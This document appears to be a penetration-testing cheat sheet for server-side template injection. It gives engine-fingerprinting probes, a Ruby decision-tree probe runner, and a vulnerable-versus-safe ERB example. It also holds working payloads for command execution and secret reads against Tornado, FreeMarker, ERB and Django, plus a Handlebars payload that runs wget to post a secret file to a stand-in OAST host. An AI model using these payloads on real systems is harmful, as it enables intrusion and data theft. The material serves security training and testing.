# SSTI

Inject a payload written in the web framework's native template syntax into a reflected **{{input}}**; the template engine then evaluates it server-side. Submitting invalid syntax often produces an error message that names the engine, and the value a probe evaluates to (`{{7*7}}` versus `{{7*'7'}}`) separates engines that share the same delimiters. Use PortSwigger's [template decision tree](https://portswigger.net/web-security/images/template-decision-tree.png) to aid ***identification***.

### SSTI manually

```
# polyglot: throws an error in most engines, and the error text fingerprints the engine
${{<%[%'"}}%\.
# close an expression the input already sits in, then evaluate
}}{{7*7}}
# harmless probes: whichever one is evaluated (or errors) reveals the syntax in use
{{fuzzer}}
${fuzzer}
${{fuzzer}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
${foobar}
{% debug %}
```
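A probe runner that walks the decision tree linked above, added here as an example; it is not part of the original page or of PortSwigger's material. The tree structure is my encoding of their image, and `http_sender`, the marker strings and the `FAKE_*` engines are constructed for the demo. The one practitioner detail worth noticing is the check: Smarty renders `${7*7}` as `$49`, so "reflection changed and contains the expected value" is the right test, not exact equality.

```ruby
require "net/http"
require "uri"

# Markers delimit the reflected probe so the check only looks at what the server
# did with our input, not at the rest of the page. Constructed values; randomise
# them per run so a cached page or a WAF rule cannot anticipate them.
MARK_L = "zq1x".freeze
MARK_R = "xzq9".freeze

# PortSwigger's decision tree as data. Each node is a probe plus the substring that
# selects the next node; :otherwise is taken when nothing matches. Leaves are
# engine names or the reason the walk stopped.
DECISION_TREE = {
  payload: "${7*7}",
  branches: {
    "49" => {
      payload: "a{*comment*}b",
      branches: { "ab" => "Smarty" },
      otherwise: {
        payload: '${"z".join("ab")}',
        branches: { "zab" => "Mako" },
        otherwise: "Unknown engine (${...} is evaluated)",
      },
    },
  },
  otherwise: {
    payload: "{{7*7}}",
    branches: {
      "49" => {
        payload: "{{7*'7'}}",
        branches: { "7777777" => "Jinja2", "49" => "Twig" },
        otherwise: "Unknown engine ({{...}} is evaluated)",
      },
    },
    otherwise: "Not vulnerable (no probe was evaluated)",
  },
}.freeze

# Text the server reflected between the markers, or nil when the input is not
# reflected at all (which also counts as "not evaluated").
def reflected_region(body)
  body[/#{Regexp.escape(MARK_L)}(.*?)#{Regexp.escape(MARK_R)}/m, 1]
end

# A probe counts as evaluated only if the reflection differs from the raw payload
# AND contains the expected result: Smarty's "$49" passes, a verbatim echo does not.
def evaluated?(body, payload, expected)
  region = reflected_region(body)
  !region.nil? && region != payload && region.include?(expected)
end

# send_probe.call(payload) must return the response body for that payload.
# Returns [leaf, list of probes sent] so the walk can be shown in a report.
def fingerprint(send_probe)
  node = DECISION_TREE
  trail = []
  while node.is_a?(Hash)
    body = send_probe.call(MARK_L + node[:payload] + MARK_R)
    trail << node[:payload]
    hit = node[:branches].find { |expected, _| evaluated?(body, node[:payload], expected) }
    node = hit ? hit[1] : node[:otherwise]
  end
  [node, trail]
end

# Sender for a real target whose GET parameter `param` is reflected (hypothetical target).
def http_sender(base_url, param)
  lambda do |payload|
    uri = URI(base_url)
    uri.query = URI.encode_www_form(param => payload)
    Net::HTTP.get(uri)
  end
end

# Constructed stand-ins for engines so the walk can be exercised offline.
FAKE_JINJA2 = ->(p) { "<h1>" + p.sub("{{7*7}}", "49").sub("{{7*'7'}}", "7777777") + "</h1>" }
FAKE_TWIG   = ->(p) { p.sub("{{7*7}}", "49").sub("{{7*'7'}}", "49") }
FAKE_SMARTY = ->(p) { p.sub("${7*7}", "$49").sub("a{*comment*}b", "ab") }
FAKE_MAKO   = ->(p) { p.sub("${7*7}", "49").sub('${"z".join("ab")}', "zab") }
FAKE_ECHO   = ->(p) { "<p>#{p}</p>" } # reflects, never evaluates

if __FILE__ == $0
  fakes = { "jinja2" => FAKE_JINJA2, "twig" => FAKE_TWIG, "smarty" => FAKE_SMARTY,
            "mako" => FAKE_MAKO, "echo" => FAKE_ECHO }
  fakes.each do |name, fake|
    engine, trail = fingerprint(fake)
    puts "#{name}: #{engine} (probes: #{trail.join(' -> ')})"
  end
end
```

Against a live target swap a fake for `http_sender("https://target.example/search", "q")` (or a POST equivalent); the tree only needs three requests per walk, which keeps the noise low.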

### Tornado

```
# close the expression the input sits in, then evaluate
}}{{ 7*7 }}
# PortSwigger lab body (URL-encoded): close the expression, use Tornado's {% import %} directive, run a command
blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('cat%20/home/carlos/secret')
# decoded: user.name}}{% import os %}{{os.system('cat /home/carlos/secret')
# the trailing }} is supplied by the template's own closing delimiter
```

### Django

```
# polyglot, errors identify the engine
${{<%[%'"}}%\,
# dumps the current context and loaded modules
{% debug %}
# reads the Django secret key if a settings object is in the template context
{{settings.SECRET_KEY}}
```

### Freemarker

```
# undefined variable: FreeMarker's error message names the engine
${foobar}
# the ?new built-in instantiates a class by name; Execute runs a shell command
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cat /home/carlos/secret") }
```

### ERB

```
# polyglot, errors identify the engine
fuzzer${{<%[%'"}}%\<>
# arithmetic probe: "49" in the response means <%= %> is evaluated
<%= 7*7 %>

# Ruby standard library is reachable directly: directory listing and file read
<%= Dir.entries('/') %>
<%= File.open('/example/arbitrary-file').read %>

# command execution
<%= system("cat /home/carlos/secret") %>
```
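The ERB probes above only fire when user input ends up inside the template source. The following is an added example, not code from the page or from the lab the payloads target, showing that pattern next to its fix: `greet_vulnerable` interpolates the input into the template string (the same bug the `<%= 7*7 %>` probe detects), `greet_safe` keeps the template fixed and passes the input as data. Function names and the greeting text are made up.

```ruby
require "erb"

# Vulnerable: the input becomes part of the template source, so any ERB tag
# it carries is compiled and executed with this method's binding.
def greet_vulnerable(name)
  template = "Hello #{name}, welcome back"
  ERB.new(template).result(binding)
end

# Safe: the template source is a constant; the input is only ever data that
# the fixed <%= name %> tag prints, so "<%= 7*7 %>" comes back verbatim.
def greet_safe(name)
  template = "Hello <%= name %>, welcome back"
  ERB.new(template).result_with_hash(name: name)
end

# Cheap detection helper for a code review or a canary test: did the arithmetic
# probe get evaluated by the renderer under test?
def renderer_evaluates_erb?(render)
  render.call("<%= 7*7 %>").include?("49")
end

if __FILE__ == $0
  probe = "<%= 7*7 %>"
  puts "vulnerable: #{greet_vulnerable(probe)}"   # Hello 49, welcome back
  puts "safe:       #{greet_safe(probe)}"         # Hello <%= 7*7 %>, welcome back
end
```

If the template really must be user-supplied (mail-merge style features), ERB is the wrong tool: there is no sandbox, and `<%= system(...) %>` has the same privileges as the web process. Use a logic-less engine for that case.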

### Handlebars

```
# polyglot, errors identify the engine
fuzzer${{<%[%'"}}%\,<>

# script to read a file and send it to Collaborator (replace OASTIFY.COM with your
# Collaborator/OAST host). "wrtz" is just a marker to find the output in the response.
# The nested #with/lookup chain reaches the Function constructor through
# String.prototype.sub, compiles the pushed code string, and each iteration of
# #each runs it; require() is available because the template executes in Node.
wrtz{{#with "s" as |string|}}
    {{#with "e"}}
        {{#with split as |conslist|}}
            {{this.pop}}
            {{this.push (lookup string.sub "constructor")}}
            {{this.pop}}
            {{#with string.split as |codelist|}}
                {{this.pop}}
                {{this.push "return require('child_process').exec('wget https://OASTIFY.COM --post-file=/home/carlos/secret');"}}
                {{this.pop}}
                {{#each conslist}}
                    {{#with (string.sub.apply 0 codelist)}}
                        {{this}}
                    {{/with}}
                {{/each}}
            {{/with}}
        {{/with}}
    {{/with}}
{{/with}}
```
